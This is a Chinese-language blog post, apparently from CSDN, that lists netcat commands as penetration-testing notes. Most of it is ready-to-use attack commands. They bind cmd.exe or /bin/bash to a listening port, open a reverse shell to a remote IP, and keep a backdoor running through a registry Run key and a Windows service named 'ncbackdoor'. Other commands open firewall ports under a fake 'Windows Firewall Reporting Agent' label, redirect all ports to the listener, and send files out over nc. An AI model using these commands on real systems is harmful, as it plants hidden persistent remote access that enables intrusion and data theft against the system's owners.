1,安装NC:wget http://osdn.dl.sourceforge.net/sourceforge/netcat/netcat-0.7.1.tar.gz tar –xzf netcat-0.7.1.tar.gz cd netcat-0.7.1 ./configure make make install
2,2种操作模式的命令格式:connect to somewhere: nc [-options] hostname port[s] [ports] … listen for inbound: nc –l –p port [options] [hostname] [port]
3,选择危险功能nc –l –p 123456 –e cmd.exe (Windows)
nc –l –p 12345 –e /bin/bash (Linux)
4,-g and -G 配置nc使用源站路由
The –g and –G options allow you to configure Netcat to use source routing. In source routing
5,-L选择反复打开进程
nc –l –p 12345 –e cmd.exe -L
6,-p指定服务端口
nc –l –p 12345
7,端口扫描
nc –[options] hostname [ports]
8,标识收/标识发
nc –l –p 12345 > textfile
nc 192.168.1.4 12345 < textfile
9,重定向所有端口的访问到NC监控端口
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 1:65535 -j REDIRECT --to-port 1234
10,开始防火墙exception mode
Netsh firewall set opmode mode = enable exceptions = enable profile = all
11,添加防火墙策略
netsh firewall add portopening TCP 12345 “Windows Firewall Reporting Agent” enable all
12,修改注册表,让NC自动运行
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d “c:\windows\nc.exe -d 192.168.1.11 12345 -e cmd.exe”
13,使用SC命令创建一个WIN服务
sc create ncbackdoor binPath= “cmd /K start c:\nc.exe –d 192.168.1.70 1111 –e cmd.exe” start= auto error= ignore
14,基本文件传输配置
nc –l –p 4444 > /test/outfile.txt
15,记时命令cat test.txt | pv –bt | nc 192.168.1.11 4444 199MB 0:00:19
,,,,,,,
暂就那么多吧,有需要渗透方面资料的朋友可以交流学习!!哈哈、、、、、、
来源:CSDN
作者:qq,2411772106
链接:https://blog.csdn.net/weixin_44212888/article/details/103686274